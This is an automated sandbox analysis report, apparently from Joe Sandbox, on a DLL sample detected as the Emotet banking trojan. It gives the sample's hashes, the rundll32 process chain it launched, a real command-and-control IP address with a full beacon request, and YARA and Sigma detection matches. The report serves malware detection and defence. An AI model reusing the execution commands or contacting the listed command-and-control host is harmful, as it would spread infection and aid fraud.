Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nhlHEF5IVY

Overview

General Information

Sample Name:nhlHEF5IVY (renamed file extension from none to dll)
Analysis ID:532437
MD5:222719bd9555a8f48428737ab34a6fa6
SHA1:b56136e6d1460055917dcb74ed849c59b35300c0
SHA256:81823e821dae4e623a5f11ccbed6e628443301afd92c0ab25e19d847927f5318
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6640 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6648 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5444 cmdline: rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 5472 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5128 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5436 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6804 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5364 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7000 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2588 cmdline: rundll32.exe C:\Users\user\Desktop\nhlHEF5IVY.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7016 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\nhlHEF5IVY.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 3096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 320 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6640 -s 340 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 3124 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6152 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6028 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6640 -ip 6640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5728 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.loaddll32.exe.c13908.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              0.2.loaddll32.exe.c13908.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0.0.loaddll32.exe.950000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  0.0.loaddll32.exe.950000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    0.0.loaddll32.exe.c13908.10.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 75 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb",ftpxGYjL, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 5436, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kaxguqlsqyxr\izodilcglz.tnb",Control_RunDLL, ProcessId: 6804

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: nhlHEF5IVY.dllVirustotal: Detection: 21%Perma Link
                      Source: nhlHEF5IVY.dllReversingLabs: Detection: 17%
                      Source: nhlHEF5IVY.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2
                      Source: nhlHEF5IVY.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.915279800.00000000050C5000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.915459206.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915340001.00000000036C7000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915541227.00000000036C7000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.915335337.00000000036C1000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915454773.00000000036C1000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: a[ojr^oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.924793134.0000000001082000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.917352625.00000000054C1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.936734757.00000000056D1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.915330304.00000000036BB000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.915597745.00000000036BB000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C0927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4C0927 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: WerFault.exe, 00000011.00000002.960602395.000000000540C000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.959116367.000000000540C000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.959062497.00000000053F1000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000002.960586783.00000000053F1000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000003.1146026752.00000000034E4000.00000004.00000001.sdmp, rundll32.exe, 00000013.00000002.1183923476.00000000034E4000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1153205743.0000024B21900000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmpString found in binary or memory: http://crl.m
                      Source: WerFault.exe, 00000011.00000002.960325858.0000000003478000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsoft%C
                      Source: svchost.exe, 0000001B.00000002.1153046299.0000024B210EC000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.14.drString found in binary or memory: http://upx.sf.net
                      Source: rundll32.exe, 00000013.00000002.1183844764.00000000034BA000.00000004.00000001.sdmpString found in binary or memory: https://45.63.5.129/
                      Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg
                      Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXgRG
                      Source: rundll32.exe, 00000013.00000002.1183797594.000000000346A000.00000004.00000020.sdmpString found in binary or memory: https://45.63.5.129/VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg~
                      Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001B.00000003.1130959349.0000024B21961000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129875776.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1129903525.0000024B219AC000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130969538.0000024B21961000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001B.00000003.1130904279.0000024B21990000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130892648.0000024B2196E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130827300.0000024B219C8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130929870.0000024B21E02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130914623.0000024B219B1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.1130856335.0000024B219C8000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: global trafficHTTP traffic detected: GET /VCbYkbegGeqHFlwstrEAhPVucLQzDdpcoetAUGcPQabBfXg HTTP/1.1Cookie: DrcWAKIBJWmaxqN=NkwkVocWd047SxLTnw1OvmLB+y7EbvgbbH9cDzoVcpFNOiH8TbRd17jGnTLmWNipx6naMHQIxHoYSzVPwPUBguk9zuItniypi2IIMHTegZbqkVJWwTqchKZCJEa8CdEJDkVjt2aOuEy16JVPzsPhYdLbDzfrtQosc0fVFxySiyuZ2Y7WCYm/zmeA1M6ob5o15LY+hv4X21nJF77G9R41fwzvyhf3rU3FrwDrOHqAa5sf6LUeLTTVybt/UQchOBgws/vF1s9/PZn3NrIJuPHQYfArST/6AkbLzBYTa3j/AcnEZVaziuy3cR+3TC1sv3ribYi1bvhCo7VVaHXnRaRtEAor7phXtz8N45GtA3gEiEudNIRjPwbX6uabhA==Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.4:49794 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3053568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.3053568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.952240.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.952240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.33c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.ce0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.ce0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a60000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.c42240.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.950000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.950000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.c13908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.c42240.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2db0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2e60000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31734a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.rundll32.exe.33c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.31734a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.2db0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.901292437.00000000009F0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.911134147.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1183708651.00000000033C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.911209239.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.961859144.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.907559664.000000000315A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1013887623.0000000002DB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1014042657.000000000303A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.927676600.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.885371581.0000000000CE0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.926867950.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.908120712.0000000002E60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.927582691.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.908789818.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.907514993.0000000000C2A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.910127434.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.857679684.0000000000AFB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.909739396.0000000000950000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.908758600.000000000093A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000003.1123003346.000000000348B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.926918217.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.962136592.0000000000BFB000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: nhlHEF5IVY.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6640 -ip 6640
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Kaxguqlsqyxr\izodilcglz.tnb:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Kaxguqlsqyxr\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00971291
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00960E97
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00960A93
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096CE90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095FE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096009A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096A29B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096E899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095A083
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095F48A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009590D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009628D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009652D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00971CDB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009592C1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00952CC2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009720CE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009610CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009662F5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00964CF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009584F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009640FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00951EFB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009546FA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095C0EA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009656E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0097261E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096C205
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095800A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00953432
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0095243F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00959824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0096282D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00953228
